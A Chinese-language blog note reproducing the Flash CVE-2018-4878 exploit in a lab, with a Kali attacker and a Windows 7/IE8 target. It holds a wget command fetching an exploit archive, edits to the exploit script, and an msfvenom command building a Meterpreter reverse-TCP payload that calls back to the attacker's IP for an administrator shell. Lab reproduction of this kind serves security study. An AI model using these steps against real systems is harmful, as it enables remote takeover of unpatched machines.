Flash CVE-2018-4878漏洞復現
- 2019 年 10 月 7 日
- 筆記
0x01 前言
Adobe公司在去年2018年2月1日發布了一條安全公告:
https://helpx.adobe.com/security/products/flash-player/apsa18-01.html
公告稱一個新的Flash 0Day漏洞(CVE-2018-4878)已經存在野外利用,可針對Windows用戶發起定向攻擊。攻擊者可以誘導用戶打開包含惡意 Flash 程式碼文件的 Microsoft Office 文檔、網頁、垃圾電子郵件等。
0x02 漏洞影響
Flash Player當前最新版本28.0.0.137以及之前的所有版本
0x03 漏洞復現
環境測試:
攻擊機:kali
目標靶機:win7x64 +IE8.0+FLASH player28.0.0.137
下載漏洞利用腳本:
wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar
可以看到漏洞利用的腳本和swf文件:

不過這裡我們需要對exp腳本進行修改,原作者將程式碼中的stageless變數改成了true,正確的應該改成:stageless = False。鏈接是:https://github.com/anbai-inc/CVE-2018-4878

其次,需要修改替換原來的shellcode程式碼,我們用kali的msf生成shellcode:
kali:192.168.1.197
win7:192.168.1.105
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.197 lport=5678 -f python>shellcode.txt

替換:

將exp腳本放入kali下和index.html同一個目錄下,生成惡意的swf文件,注意腳本下生成swf的目錄是/opt/CVE-2018-4878,可以自定義修改目錄

為了讓win7訪問惡意文件,我們開啟kali的web服務,將swf文件放到www目錄下:

在msf下監聽:

開始進行監聽之後,在win7上用ie打開197的80埠服務:

Shell回顯過來了!

管理員許可權:

0x04 漏洞修復
升級到最新版本即可